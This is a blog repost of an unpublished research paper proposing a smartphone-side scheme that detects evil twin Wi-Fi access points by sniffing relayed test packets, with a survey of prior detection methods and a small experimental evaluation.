이 글은 제가 석사과정 끝날 즈음 MobiCom 2014 에 투고했다가 떨어진 논문을 옮긴 글입니다. 여러모로 후속 연구는 없을 듯 하여 블로그에 공개합니다.
How can you trust a stranger? This study starts with this question. Your smartphone has various and important information about you. So, how can you assure that a Wi-Fi you've never connected is secure to use free internet access? The more prevalent smartphone becomes, the more important Wi-Fi security is. Evil twin access point tries to capture your information without your permission. This study is about an approach for smartphones to detect evil twin access point without any help. In this study, we analyze evil twin access point attack and survey related works. Finally, we propose relay sniffing based evil twin access point detection scheme. This scheme does not rely on any third party authentication, traffic characteristics, dual networks, statistics, and training. But, it takes traditional wireless network vulnerability which every packet is open to public and uses it as a clue for evil twin access point detection. Experimentally, our proposed scheme makes smartphones able to detect evil twin access point 99.9% and warn the user.
How can you trust a stranger? If you don't have any information about someone you have met before, you cannot just be relaxed. But, at that time, if the stranger offers you a favor, what will you do? It's apparent that you can benefit from him when you trust that one. Nonetheless, you cannot assure whether the benefit is a pure favor or can be harmful to you. In this question, Most people may answer that it needs a reliable third party certificate to trust the stranger somehow. Showing public identification which contains reliable authentication can be an example. But, if not, would you believe that the stranger's favor is true?
Let's change the case of preamble question to your smartphone. How can you trust an access point (AP) you've never connected before? It's favorable for you to use Wi-Fi to access the internet instead of cell networks like 3G, LTE, LTE-A to avoid data rate. But, you cannot assure that the AP which supports your Wi-Fi connection is safe. If the AP you connected is evil twin AP, every data you transmitted and received through Wi-Fi can be captured by the attacker. If so, your personal information like credit card number, Facebook and e-mail password can be accessed by the attacker without your permission.
These days, smartphones have become very essential to our daily lives . People can access the internet everywhere. We can also communicate, shop, study, do business using smartphones. Smartphones offer the internet connection based on cell or Wi-Fi networks. But, unlike cell networks which charge a data rate, Wi-Fi usually offers free internet access to authenticated users. Thanks to Wi-Fi's flexible extendibility, nowadays many public places like airport, university, hotel, and coffee shop offer a free internet access to smartphone users.
Current smartphone has various and important personal information about the user . So, the more prevalent smartphone becomes, the more important Wi-Fi security is . But, because smartphone users move and try to connect to various APs, unlike cell networks which can support a central uniform filtering system, it could not assure that it has a third party authentication system like remote authentication dial-in user service (RADIUS) server. Unfortunately, the information about new AP is limited to the user who wants to use first seen Wi-Fi securely.
This study is about an approach for a smartphone to detect evil twin AP which tries to sniff communication through Wi-Fi without any help. The rest of this paper consists of 5 chapters. Chapter 2 introduces backgrounds of evil twin AP attack. Chapter 3 surveys related works about evil twin AP detection schemes. In Chapter 4, we propose a new evil twin AP detection scheme. Our proposed scheme is evaluated in chapter 5. Finally, we give you the conclusion of this study and our answer to the preamble question in chapter 6.
2.1. Paradigm Shift of AP Attacks
AP attacks before the advent of smartphones were mainly rogue AP. Figure 1 shows rogue AP attack. Like backdoor, it emasculates security system using unauthorized AP installed by authorized person. At this time, because the information which should be protected is stored in servers mainly, unauthorized access to the server using rogue AP causes serious risks. So, this rouge AP attack can be categorized as insider attack. Also, it is regarded as social engineering issue.
On the other hand, paradigm of AP attacks was shifted after the advent of smartphone. Because the information which should be protected is stored in not only servers but also smartphones, the main target of AP attack is changed from servers to smartphones.
The victim is not fixed anymore but it can move. Then, attacker should move too. So, this evil twin AP can be categorized as outsider attacks . Picture 2 shows evil twin AP attack. In light of unauthorized AP's illegal action, evil twin AP attack can be seen as rogue AP. An important point is not the name of the attack, but Paradigm shift of AP attacks
2.2. Threat of Evil Twin AP to Smartphones
Aforementioned evil twin AP attack can spoof smartphone users easily. When a smartphone scans available AP and the user selects it, the AP which has strong signal strength is selected firstly . The stronger signal strength is, the more stable the smartphone users can use the high speed internet access. Evil twin AP tries to be located closer to smartphone users and provides stronger signal than a legitimate AP to attract them. So, even though evil twin AP attack is an outsider attack, it’s not an indiscriminate attack but a targeting attack which selects a victim.
Service set identifier (SSID) is exposed to smartphone users like AP's name. If evil twin AP uses reliable SSID to the users, spoofing them is much easier . For example, if evil twin AP uses 'Starbucks' in Starbucks coffee shop, they might not doubt evil twin AP.
Evil twin AP offers the internet access to the users too. If not, smartphone users do not connect evil twin AP. Therefore, it is difficult for a smartphone user to recognize that the AP they connected is evil twin AP and they have become the target. The attacker can capture and store packets while the victim accesses Wi-Fi without their permission. If packet is encrypted, it may be more secured. But, the packet stored once may be the target of offline brute force attack to be decrypted.
3. RELATED WORKS
3.1. Traffic Analysis Based Detection
Traditional rogue AP detection scheme is MAC address filtering applied by Cisco . But, MAC address can be spoofed by attacker . Also, detouring MAC address filtering scheme is already published . On the other approach, filtering a packet which comes from wireless network through rogue AP and arrives in wired network was studied [3-4]. On the other hand, several network traffic analysis based schemes were published [13-14]. But, these schemes present somewhat false-positive ratio while rogue AP detection in real networks environment which has a lot of factors to affect the result . Therefore, it cannot be assured that analyzing several packets or traffic characteristics can give a perfect clue for evil twin AP detection.
3.2. AP Nature Analysis Based Detection
Suman Jana et al proposed clock skew based rogue AP detection scheme . Clock skew is an AP's nature which every AP can be identified even they are same model and has same brand. They registered all the AP's nature and judged each AP in Wi-Fi network whether registered or not. If an AP which has unregistered clock skew nature, it is regarded as rogue AP. This kind of scheme needs training cost. In other words, every legitimate AP should be registered first before being regarded as rogue AP. But, real Wi-Fi network environment can be changed frequently. For example, current smartphone itself can be an AP and a supplicant.
3.3. User Side Detection
Somayeh et al proposed hop count based user side rogue AP detection scheme . They suggested that sent packet has extra hop, there is evil twin AP due to Man-in-themiddle attack. Their scheme can be seen well but there are two drawbacks. Firstly, they should know previous hop count to know a hop count increment. That means the scheme needs training cost. If so, smartphone users should pay the cost every time when they go to unfamiliar places and try to access the internet through Wi-Fi you've never connected. Secondly, even in wired network, packet routing can be changed frequently to find optimal path. Needless to say, wireless network's routing can vary. That is, the hop count which the smartphone knows due to right before training can be meaningless. Consequently, hop count based evil twin AP detection is limited in real Wi-Fi network. Jaemin Lee et al proposed dual networks based user side evil twin AP detection scheme . This scheme uses 3G and Wi-Fi networks. Their scheme compares undamaged certificate sent through 3G and certificate sent through WiFi to detect evil twin AP. But there are two drawbacks in their scheme. Firstly, their scheme relies on network infrastructure. If smartphone users cannot access dual networks simultaneously, their scheme cannot be implemented. Secondly, their scheme needs web server which receives packets smartphone users sent. That is, it is not pure and independent user side evil twin AP detection because it relies on the server. Chao Yang et al proposed statistical technique based user side evil twin AP detection scheme . This scheme does not rely on training but it cannot eliminate whole false positive ratio.
4. PROPOSED SCHEME
In this study, we propose relay sniffing based evil twin access point detection scheme. This scheme does not rely on any third party authentication, traffic characteristics, statistics, dual networks, and training. Wireless networks are well known that it is more vulnerable than wired networks because it uses radio frequency as its medium and transmits data to every device in transmission range. But, our proposed scheme takes traditional wireless network vulnerability which every packet is open to public and uses it as a clue for evil twin AP detection. If a smartphone can sniff the packet which relayed by evil twin AP, it can detect existing evil twin AP without any help. In this scheme, the only thing the smartphone needs to detect evil twin AP is just one packet. To understand it better, let's compare the environments between existing evil twin AP and not under our proposed scheme.
Figure 3 shows proposed scheme in normal Wi-Fi access. First of all, a smartphone starts monitoring its Wi-Fi network environment and sends test packet. Then, the smartphone can sniff all the packets including its test packet. If the AP in which the smartphone is connected is not evil twin AP, the smartphone can sniff that sender's MAC address of the test packet is its MAC address and receiver’s MAC address is the AP's MAC address.
On the other hand, Figure 4 shows how our proposed scheme works in Wi-Fi access through evil twin AP. First of all, a smartphone starts monitoring around Wi-Fi networks and sends a test packet. Then, evil twin AP relays the packet to offer the internet access to the smartphone. Because this relaying packet reaches to the smartphone too, the smartphone can recognize that there are two test packets in its monitoring interface. The second test packet which evil twin AP relayed and the smartphone captured says that sender is the AP in which the smartphone is connected. Using this packet, the smartphone can detect that it is connected to evil twin AP. Consequently, the smartphone disconnects current Wi-Fi access and warn the user. Figure 5 shows the procedure of our proposed scheme.
We made an android smartphone application implementing our proposed scheme to evaluate in real Wi-Fi network environment. The source code of the application can be downloaded in http://www.(veiled until notification due to double-blind review).net. Even though it does not need in our scheme, we uploaded source code of server side program which makes us know if the smartphone sends a test packet or not. The procedure of making evil twin AP is published in .
We used Samsung Galaxy S3 which is identified as SHVE201S by the manufacturer and using Android 4.3, TG NXI-L7000 laptop as evil twin AP which uses Backtrack R5 Linux as its OS, two Next-201N mini USB type WLAN card using RealTek 8188CUS chipset, and one desktop with an IPtime N150UA_Solo USB type WLAN card using Ralink 3070 chipset as legitimate AP.
We wanted to evaluate our proposed scheme with only one smartphone, but we faced an obstacle during implementation. Configuring smartphone's Wi-Fi interface mode from managed to monitor was introduced in . But, it needs root permission of the smartphone. In several countries including U.S., rooting or jail breaking of smartphones is illegal in some case . Therefore, we used one more laptop to support monitoring Wi-Fi network which is needless originally in the scheme.
Figure 6 shows the application implementing our proposed scheme. If you touch “WiFi Scan OFF” toggle button, the smartphone starts scanning candidate APs near the smart phone to access the internet repeatedly. When you touch “WiFi Scan On” toggle button again, you can hold updating candidate AP list like Figure 7. Then you can select the AP which will be tested when you touch “AP test” button which located in right side of SSID of the AP. Connection changing and sending test packet are performed by the application automatically like Figure 8. So, that test packet is captured by monitoring mode laptop. As mentioned above, the roll of monitoring can perform by the smartphone itself . But, in this evaluation, we copied the packet captured (PCAP) file from monitoring mode laptop to smartphone manually to avoid smartphone rooting. So, the smartphone which has PCAP file can analyze monitoring result. When you touch bottom “Detect Evil Twin Access Points” button, like figure 9, the application shows whether the AP you touched its test button is evil twin AP or not using our proposed scheme.
We evaluated our proposed scheme using this application several hundred times and it missed detecting evil twin AP only one time. Usually, retransmission due to signal loss occurs in wireless network occasionally. So, monitor mode does not guarantee every packet is captured. But, our proposed scheme makes smartphones able to detect evil twin AP 99.9% and warn the user. Because, as mentioned, the attacker may try to be closer to victims to lure them with higher signal strength than legitimate AP, we think this evil twin AP detection scheme can work with almost perfect detecting ratio similarly in real attacking environment.
In the preamble of this paper, we ask that how can you trust a stranger. Our answer is never. But, if in the case we can benefit from him when we trust that one, we will change the question like how can you doubt a stranger? If so, our answer is simple. If someone shows a suspicious action then we cannot trust him.
So far, we surveyed already published related works to detect evil twin AP and analyzed their limitation. Finally, we proposed relay sniffing based evil twin AP detection scheme. As mentioned above, our proposed scheme is simple but powerful and does not rely on any third party authentication, traffic characteristics, dual networks, training and statistics. In our evaluation, our proposed scheme shows that it makes a smartphone able to detect evil twin AP 99.9% and warn the user. In our opinion, this scheme can work with almost perfect detecting ratio similarly in real attacking environment.
Last but not least, we address three limitation of our proposed scheme. Firstly, as aforementioned in chapter 5, our proposed scheme should be implemented by smartphone manufacturers or smartphone OS developer to avoid intellectual property conflicts. Our proposed scheme needs root permission to control Wi-Fi interface to monitor mode. Secondly, legitimate Wi-Fi repeater works similarly with evil twin AP. It relays a smartphone user's data to another AP, So, our proposed scheme may judge it as evil twin AP. Therefore, final selection should be leaved for the user. The ultimate goal of our proposed scheme is giving serious warnings to the user, not absolutely blocking all wireless relaying transmission. Lastly, if our proposed scheme is implemented without any more consideration, smartphones may not detect evil twin AP when there is security algorithm like IEEE 802.11i between evil twin AP and legitimate AP. Figure 10 shows this environment for easy understand.
Like figure 10, if our proposed scheme is implemented simply, smartphone may not detect evil twin AP in some case because they cannot find test packet in communication between evil twin AP and legitimate AP. Actually, this limitation can be regarded as social engineering problem because evil twin AP is authorized one for legitimate AP.
But, in our opinion, if those communication packets captured and stored in the smartphone once, it could be decrypted using tools like Aircrack-ng, Cowpatty through offline dictionary attack  or trying known plain text attack. The more things the smartphone needs to exploit our proposed scheme are enough volume of dictionary data and computational power. So, we suggest that it can be regarded by smartphone manufacturers and its OS developers in the light of proactive and offensive wireless security.
 Minwoo Park et al, "Dangerous Wi-Fi access point: attacks to benign smartphone applications", Personal and Ubiquitous Computing, Oct. 2013
 Sungmin Lee et al, "A mitigation scheme of DoS attacks against IEEE 802.11i using dynamic MAC address", International Conference on Electrical Engineering & Computer Science, Dec. 2013
 Lanier Watkins et al, "A Passive Approach to Rogue Access Point Detection", IEEE GLOBECOM 2007
 Raheem Beyah el al, "Rogue-Access-Point Detection Challenges, Solutions, and Future Directions", IEEE Security and Privacy, Volume 9 Issue 5, Sept. 2011, Pages 56-61
 Somayeh Nikbakhsh et al, "A Novel Approach for Rogue Access Point Detection on the Client-Side", International Conference on Advanced Information Networking and Applications Workshops, 2012  Suman Jana et al, "On Fast and Accurate Detection of Unauthorized Wireless Access Points Using Clock Skews", IEEE Transactions on Mobile Computing, Vol.9, No.3, Mar. 2010, Pages 449-462
 Vivek Ramachandran, "BackTrack 5 Wireless Penetration Testing Beginner's Guide", PACKT Publishing, 2011
 Kevin Benton, "The Evolution of 802.11 Wireless Security", UNLV Informatics, Apr. 2010
 Jaemin et al, "Man-in-the-middle Attacks Detection Scheme on Smartphone using 3G network”, IARIA, 2012
 Chao Yang et al, "Active User-Side Evil Twin Access Point Detection Using Statistical Techniques", IEEE Transactions on Information Forensics and Security, Vol. 7, No. 5, Oct. 2012
 Omri Ildis et al, http://bcmon.blogspot.kr
 Richi Jennings, "Jailbreak or unlock hacks of iPhone to be ILLEGAL under Obama's TPP treaty", Computerworld, Nov. 19. 2013
 Raheem Beyah el al, “Rogue Access Point Detection using Temporal Traffic Characteristics”, IEEE GLOBECOM, Nov. 2004
 Hao Han et al, “A measurement Based Rogue AP Detection Scheme”, IEEE INFOCOM, Apr. 2009